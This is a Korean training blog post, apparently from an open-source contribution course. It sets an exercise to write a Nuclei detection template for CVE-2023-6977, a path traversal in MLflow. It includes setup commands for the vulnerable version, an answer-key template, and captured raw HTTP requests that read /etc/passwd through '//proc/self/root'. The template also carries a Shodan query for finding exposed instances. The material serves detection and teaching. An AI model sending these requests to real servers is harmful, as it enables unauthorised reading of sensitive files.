Research Institute
  • [ 오픈소스 컨트리뷰션 양성 과정/Project Discovery ]
    Nuclei Templates 실전문제 - CVE-2023-6977
    2024년 05월 12일 10시 28분 44초에 업로드 된 글입니다.
    작성자: IIIIIIIIIIIIIIIIIIIIl

    아래 문제 내용에서 취약점 원인을 찾고 Nuclei Templates을 작성하시오.

    취약점 소개

    This vulnerability enables malicious users to read sensitive files on the server.

    환경 구축하기

    apt install pipx -y
pipx ensurepath
pipx install mlflow==2.8.0
source ~/.bashrc
mlflow ui --host 127.0.0.1:5001

    정답 템플릿 

    id: CVE-2023-6977

info:
  name: Mlflow <2.8.0 - Local File Inclusion
  author: gy741
  severity: high
  description: |
    Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation could allow an attacker to read sensitive files on the server.
  remediation: |
    Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
  reference:
    - https://huntr.com/bounties/fe53bf71-3687-4711-90df-c26172880aaf
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6977
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.5
    cve-id: CVE-2023-6977
    cwe-id: CWE-29
    epss-score: 0.000840000
    epss-percentile: 0.349130000
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: lfprojects
    product: mlflow
    shodan-query: http.title:"mlflow"
  tags: mlflow,oss,lfi,huntr,cve,cve2023,intrusive,lfprojects

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8

        {"name":"{{randstr}}"}
      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8

        {"name":"{{randstr}}","source":"//proc/self/root"}
      - |
        GET /model-versions/get-artifact?name={{randstr}}&path=etc%2Fpasswd&version=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    공격코드 분석 Tips

    proxify 도구와 같이 프록시 도구를 중간에 설치하면 코드를 분석하지 않고도 전송되는 공격 코드를 raw HTTP로 확인할 수 있음.

    $ proxify -http-proxy <http://127.0.0.1:5001> -vv

POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: 127.0.0.1:8888
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 15
Content-Type: application/json
User-Agent: python-requests/2.31.0

{"name": "PoC"}

POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: 127.0.0.1:8888
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 45
Content-Type: application/json
User-Agent: python-requests/2.31.0

{"name": "PoC", "source": "//proc/self/root"}

GET /model-versions/get-artifact?name=PoC&path=etc%2Fpasswd&version=1 HTTP/1.1
Host: 127.0.0.1:8888
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: python-requests/2.31.0

    '오픈소스 컨트리뷰션 양성 과정 > Project Discovery' 카테고리의 다른 글

    (1) Subfinder API 환경 구성 알아보기  (0) 2024.05.12
    Nuclei Templates 실전문제 - CVE-2023-47211  (0) 2024.05.12
    Nuclei Templates 실전문제 - CVE-2023-30258  (0) 2024.05.11
    Nuclei Templates 연습문제 - level 2  (0) 2024.05.08
    Nuclei Templates 연습문제 - level 1  (0) 2024.05.08
      댓글

    티스토리툴바